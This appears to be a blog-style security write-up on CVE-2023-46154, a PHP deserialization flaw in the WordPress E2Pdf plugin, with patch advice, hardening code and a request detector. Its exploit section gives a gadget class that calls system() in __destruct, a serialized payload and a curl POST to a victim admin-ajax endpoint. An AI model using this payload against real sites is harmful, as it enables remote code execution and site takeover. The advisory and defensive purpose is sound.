WordPress plugins make the web more dynamic and flexible. But one careless coding practice can open dangerous security holes on thousands of sites at once. In this exclusive post, we will break down CVE-2023-46154 – a serious Deserialization of Untrusted Data vulnerability in the E2Pdf plugin (all versions up to and including 1.20.18).

This bug could let attackers run any code they want on your site, take it over, or even jump to your server. We’ll show how it works, why it’s risky, and how it can be exploited – with code samples and references.

What is E2Pdf?

E2Pdf is a popular plugin that lets WordPress users export data to PDF files. People love using it to create PDFs from forms or custom data. With over 40,000 active installations, a bug in E2Pdf could have big consequences.

Link to E2Pdf Official Plugin Page

What Is Deserialization of Untrusted Data (CVE-2023-46154)?

Deserialization is when code takes information (like a PHP object) that was stored as a string and turns it back into a usable object. If user input is “deserialized” without safety checks, an attacker can smuggle in crafted objects whose methods run code on your server.

That’s what happened in E2Pdf, leading to CVE-2023-46154.

The core issue:
unserialize() is used directly on user input, and an attacker can abuse that to deliver a "payload" object that runs any PHP code they choose.

Which Versions Are Affected?

All versions from the very start through 1.20.18.

> Upgrade immediately if you’re running an old version.

Inside the plugin, user input was passed to the PHP unserialize() function with no real checks:

// Vulnerable code (simplified for clarity)
$data = $_POST['data'];
$obj = unserialize($data);

If an attacker controls $_POST['data'], they can pass a crafted serialized object that triggers dangerous functions through PHP "magic methods" (such as __wakeup and __destruct), which PHP calls automatically when the object is rebuilt or destroyed.
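As an added example (not E2Pdf's code and not from the original post), here is the vulnerable unserialize() call beside two hardened forms, demonstrated with a harmless Marker class whose __wakeup() only records that it ran. The class name, the function names and the HMAC secret are assumptions for illustration.

```php
<?php
// Added example (not E2Pdf's code): the unsafe unserialize() pattern next to
// its hardened forms, shown with a harmless marker class instead of a gadget.
// Class name, function names and the secret are assumptions for illustration.

declare(strict_types=1);

// Harmless stand-in for an attacker-chosen class: its magic method only
// records that it was invoked, nothing else.
class Marker
{
    public static bool $wakeupRan = false;

    public function __wakeup(): void
    {
        self::$wakeupRan = true;
    }
}

// Vulnerable pattern: unserialize() instantiates whatever class the string
// names, so that class's __wakeup()/__destruct() run on attacker-supplied data.
function deserializeUnsafe(string $data)
{
    return unserialize($data);
}

// Hardened pattern (PHP >= 7.0): allowed_classes => false means no class is
// ever instantiated. Object entries come back as __PHP_Incomplete_Class and
// no magic method fires; scalars and arrays still round-trip normally.
function deserializeHardened(string $data)
{
    if (strlen($data) > 4096) {
        return false; // reject oversized input before parsing it
    }
    return unserialize($data, ['allowed_classes' => false]);
}

// Preferred replacement for new code: carry structured data as JSON, which
// cannot name PHP classes at all, and authenticate it with an HMAC so only
// values the server itself produced are accepted.
function encodeSigned(array $payload, string $secret): string
{
    $json = json_encode($payload, JSON_THROW_ON_ERROR);
    return base64_encode($json) . '.' . hash_hmac('sha256', $json, $secret);
}

function decodeSigned(string $token, string $secret): ?array
{
    [$b64, $mac] = array_pad(explode('.', $token, 2), 2, '');
    $json = base64_decode($b64, true);
    if ($json === false || !hash_equals(hash_hmac('sha256', $json, $secret), $mac)) {
        return null; // forged or tampered token
    }
    $decoded = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    return is_array($decoded) ? $decoded : null;
}

// Constructed input: a serialized Marker object, i.e. the kind of string an
// attacker would place in a request parameter.
$untrusted = serialize(new Marker());

Marker::$wakeupRan = false;
deserializeUnsafe($untrusted);
printf("unsafe:   __wakeup ran = %s\n", Marker::$wakeupRan ? 'yes' : 'no');

Marker::$wakeupRan = false;
$result = deserializeHardened($untrusted);
printf("hardened: __wakeup ran = %s, result class = %s\n",
    Marker::$wakeupRan ? 'yes' : 'no', get_class($result));

$secret = 'assumed-server-side-secret';
$token  = encodeSigned(['form_id' => 7, 'title' => 'Invoice'], $secret);
var_dump(decodeSigned($token, $secret));        // the original array
var_dump(decodeSigned($token . 'x', $secret));  // null: signature mismatch
```

Run with the PHP CLI: the unsafe call reports that __wakeup ran, while the hardened call reports that it did not and returns a __PHP_Incomplete_Class object, which the caller can then reject. The allowed_classes option is the minimal in-place fix for code that must keep accepting serialized strings; the signed-JSON variant removes the class-instantiation surface entirely and is the better choice for any new export/import path.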

To exploit this bug, the attacker needs to:

1. Create a malicious PHP class with a destructor (__destruct), or a similar “magic method” that does bad things.
2. Serialize an object of this class with dangerous code inside.
3. Send the payload in the data parameter (as a POST request) to where the plugin unserializes it.

a. Malicious Class (the payload)

<?php
class Evil {
    public $cmd;
    function __construct($command) {
        $this->cmd = $command;
    }
    function __destruct() {
        system($this->cmd);  // Command runs when object is destroyed
    }
}

// Create and serialize the object
$obj = new Evil('touch /tmp/hacked_by_cve_2023_46154');
echo urlencode(serialize($obj));

The output will be a serialized object, like:

O:4:"Evil":1:{s:3:"cmd";s:28:"touch /tmp/hacked_by_cve_2023_46154";}

Using curl (or Burp Suite, etc.):

curl -X POST -d "data=O%3A4%3A%22Evil%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A28%3A%22touch%20%2Ftmp%2Fhacked_by_cve_2023_46154%22%3B%7D" \
https://victim-site.com/wp-admin/admin-ajax.php?action=e2pdf_some_action

*(Note: the actual AJAX action/endpoint will need to be adjusted to match the E2Pdf function in use — see references for more on finding the endpoint!)*

When the vulnerable site processes this request, it unserializes the payload and – boom! – runs the system() command, creating a file /tmp/hacked_by_cve_2023_46154 on the server.

Original Discovery and References

- WPScan Advisory
- NVD Entry for CVE-2023-46154
- Patch description
- Technical Write-up (packetstorm)

Real-World Impact

- Remote Code Execution (RCE): Full site/server takeover is possible.
- Update E2Pdf immediately to version 1.20.19 or higher.
- Check for suspicious admin users, unknown plugins, or left-over shells/uploads.
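An added example, not from the original post or from the plugin, of a check a defender can put in front of request handling or run over captured request logs: it flags any request parameter that carries a PHP-serialized object (the O:<len>:"Class": signature), so attempts against this kind of bug are blocked or surfaced regardless of which gadget class is used. The log format, the parameter name and the e2pdf_some_action placeholder are assumptions.

```php
<?php
// Added example (not E2Pdf's or WordPress's code): flag request parameters
// that carry a PHP-serialized object, usable as a WAF-style pre-check or as
// a scan over captured requests. The log lines below are constructed.

declare(strict_types=1);

// A serialized PHP object starts with O:<len>:"<ClassName>":<n>:{ (or C: for
// classes with a custom serializer). Look for it at the start of the value or
// nested inside an array/object (after '{', ';' or ':'). The extra
// rawurldecode() catches values that were percent-encoded twice.
function containsSerializedObject(string $value): bool
{
    $decoded = rawurldecode($value);
    $pattern = '/(?:^|[{;:])[OC]:\d+:"[A-Za-z_\\\\][\w\\\\]*":\d+:\{/';
    return (bool) preg_match($pattern, $decoded);
}

// Return the names of parameters in a urlencoded body that carry an object.
function findSuspiciousParams(string $body): array
{
    parse_str($body, $params);
    $hits = [];
    foreach ($params as $name => $value) {
        if (is_string($value) && containsSerializedObject($value)) {
            $hits[] = (string) $name;
        }
    }
    return $hits;
}

// Constructed request log, one "<method> <path> <urlencoded body>" per line.
// Line 1 carries a plain serialized array, line 2 a serialized object of a
// made-up class "Demo", line 3 an ordinary string.
$log = [
    'POST /wp-admin/admin-ajax.php action=e2pdf_some_action&data=a%3A1%3A%7Bs%3A2%3A%22id%22%3Bi%3A7%3B%7D',
    'POST /wp-admin/admin-ajax.php action=e2pdf_some_action&data=O%3A4%3A%22Demo%22%3A1%3A%7Bs%3A4%3A%22note%22%3Bs%3A1%3A%22x%22%3B%7D',
    'POST /wp-admin/admin-ajax.php action=heartbeat&data=hello%20world',
];

foreach ($log as $i => $line) {
    [$method, $path, $body] = explode(' ', $line, 3);
    $hits = findSuspiciousParams($body);
    printf("%d %s %s -> %s\n", $i + 1, $method, $path,
        $hits ? 'ALERT: serialized object in ' . implode(',', $hits) : 'ok');
}
```

Only the second line is flagged: a serialized array (line 1) is a legitimate shape that some plugins exchange, so the check keys on the object marker rather than on serialized data in general. Apply it to request input only; WordPress itself legitimately unserializes values it stored in its own database (via maybe_unserialize), and those are not what this check is for.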

Conclusion

CVE-2023-46154 is a powerful reminder of the risks from unsafe deserialization in PHP applications, especially in high-use plugins like E2Pdf. This exclusive breakdown showed you how the bug works, potential exploits, and why it's so dangerous.

If your website or server ran vulnerable E2Pdf, attackers could already be lurking. Patch now, and audit for backdoors!

Stay safe. Patch, monitor, and never trust user input.

*Written for the community – please share to help keep WordPress users secure!*

Timeline

Published on: 12/19/2023 00:15:07 UTC
Last modified on: 12/22/2023 19:39:53 UTC